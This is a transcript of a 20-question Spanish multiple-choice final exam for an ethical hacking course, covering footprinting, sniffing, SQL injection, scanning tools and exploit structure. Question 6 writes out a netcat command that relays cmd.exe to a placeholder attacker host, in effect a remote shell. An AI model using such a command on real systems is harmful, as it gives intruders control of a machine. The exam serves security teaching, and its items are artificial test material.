Examen de Etical Hacking

2

Click here to load reader

description

Examen Final de la Materia Etical Hacking de la Maestría en Seguridad Informática Aplicada de la ESPOL.

Transcript of Examen de Etical Hacking

Page 1: Examen de Etical Hacking

Examen FinalCurso : Ethical Hacking

Nombre del Alumno : ......................................................................................................Fecha : 21-22/9/09

Indicaciones :A. Marcar las alternativas seleccionadas con un circulo alrededor de cada opción.B. Considerar siempre la(s) alternativa(s) correcta(s) o la(s) mejor(es) alternativa(s).C. El examen es individual.D. La duración del examen es de 20 minutos.

1. En un exploit hecho en C Ud. encuentra una sección llena de códigos en hexadecimal (\x##), esta seccion corresponde a : A. La DLL que se explotará. B. La firma que deja el exploit. C. Padding. D. El shellcode.

2. Dónde debería buscar un evaluador de seguridad la información que podría ser usada por un atacante contra una organización ? (Seleccionar todas las que aplican)A. Salones de chat.B. Bases de datos WHOIS.C. Grupos de Noticias.D. Sitios Web.E. Motores de búsqueda.F. El propio sitio web de la organización.

3. Cuáles de las siguientes actividades NO es considerada footprint pasivo ?(Seleccionar todas las que aplican)A. Buscar dentro de la basura para encontrar información que ha sido descartada.B. Buscar en el sitio financiero de Yahoo Financial para encontrar activos.C. Escanear un rango de direcciones IP que se encontraron en la base de datos DNS.D. Ejecutar múltiples búsquedas usando motores de búsquedas.

4. Durante el footprint de una red, qué puerto indica la posibilidad de hacer una transferencia de zona ?A. 53 UDPB. 53 TCPC. 25 UDPD. 25 TCPE. 161 UDPF. 22 TCPG. 60 TCP

5. Mientras se ejecuta un ping sweep en una subred, se reciben respuestas ICMP Código 3 Tipo 13 para todos los pings enviados. Cuál es la causa más frecuente para obtener esta respuesta ?A. El firewall esta rechazando los paquetes.B. Un IDS-inlines esta rechazando los paquetes.C. Un router en el ISP esta bloqueando ICMP con ACLs.D. El host no responde a paquetes ICMP.

6. La línea nc ip_attacker 80 | cmd.exe | nc ip_attacker 25 corresponde al uso de netcat para A. Un canal encubierto. B. Un escaneo de puertos. C. Descarga de un archivo. D. RFI/LFI

7. En Linux, cuáles son los 3 comandos más comúnes que los hackers usualmente “troyanizan” :A. car, xterm, grepB. netstat, ps, topC. vmware, sed, lessD. xterm, ps, nc

8. Fidia fue contratada para ejecutar una evaluación de seguridad interna. Rapidamente se da cuenta que usan switches en vez de hubs. Esto la limita en su habilidad para obtener información mediante el sniffing de la red. Cuál de las siguientes técnicas puede usar Fidia para obtener información de una red basada en switches o para deshabilitar alguna de las características de aislamiento de los switches ? (Escoja 2)A. Ethernet ZappingB. MAC FloodingC. Sniffing en modo promiscuoD. ARP Spoofing

Page 2: Examen de Etical Hacking

9. Julio ha sido contratado para evaluar la seguridad de una aplicación web. Julio se da cuenta que el sitio es dinámico e infiere que deben estar haciendo uso de una base de datos como backend de la aplicación. Julio quiere validar sí es posible hacer una inyección de SQL. Cuál es el primer caracter que Julio debería usar para intentar quebrar los requerimientos SQL ?A. Semi ColumnB. Double QuoteC. Single QuoteD. Exclamation Mark

10. En qué modo debe operar una tarjeta de red para realizar un sniffing ?A. Compartido.B. Sin Encriptación.C. Abierto.D. Promiscuo.

11. Un Idle Scan es una función propia de :A. nmapB. scapyC. hpingD. todos los anteriores

12. Ud. requiere validar los parches instalados en un MS Windows, la funcionalidad de Local Security Checks le sirve para esta validación A. SIB. NO

13. El URL http://1209882139 es válidoA. SIB. NO

14. Ud. se encuentra en la búsqueda de exploits de una fuente aproximadamente confiable, cual de estas puede serA. cve.mitre.orgB. www.kartoo.orgC. ww.milw0rm.comD. www.open-sec.com

15. En la explotación de una vulnerabilidad, que describe mejor al payloadA. Sección que realiza el buffer overflowB. Sección que prepara el targetC. Sección que implementa el ataque, por ejemplo, un shell reversoD. Sección que realiza la evasión de intrusos

16. En que puerto escucha por default ParosA. 3128B. 8080C. 31337D. 8000

17. Cual es la opción que se debe activar en Nessus para evitar afectar la disponibilidad de los hosts que se evaluanA. No DoSB. Secure ChecksC. Safe ChecksD. Prevent Insane Checks

18. Que tipo de Flag TCP no es validoA. ACKB. SYNC. RSTD. END

19. Ud. tiene acceso a un host Linux como un usuario simple y tiene instalado nmap en forma correcta y operativa, ejecuta : nmap -v -sS 192.168.254.209 y obtiene un mensaje de error y no ejecuta el programa, cual es la causa mas frecuente ?A. Es una versión antigua de nmapB. Se requiere acceso como administratorC. Se requiere tener privelegios de rootD. Esta pasando por un firewall de host

20. Ud. quiere evitar ser bloqueado por un IPS mientras realiza un ethical hacking, que medida no es adecuada en estas situacionesA. Usar Unicorn porque hace el escaneo más rápidoB. No escanear los puertos más usados porque siempre estan protegidosC. Fragmentar los paquetes que se envianD. Preguntar al admin de la red cuáles son las aplicaciones que utiliza